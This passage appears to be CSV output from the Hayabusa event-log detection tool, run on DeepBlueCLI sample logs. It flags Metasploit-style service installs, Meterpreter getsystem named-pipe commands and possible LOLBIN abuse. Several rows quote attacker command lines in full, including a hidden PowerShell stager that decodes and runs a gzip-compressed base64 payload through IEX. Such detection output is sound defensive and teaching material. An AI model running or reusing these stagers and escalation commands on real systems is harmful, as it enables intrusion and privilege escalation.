O4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,info,,New Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:00:33.473 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:00:33.590 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,info,,New Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,info,,New Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,info,,New Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,info,,New Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
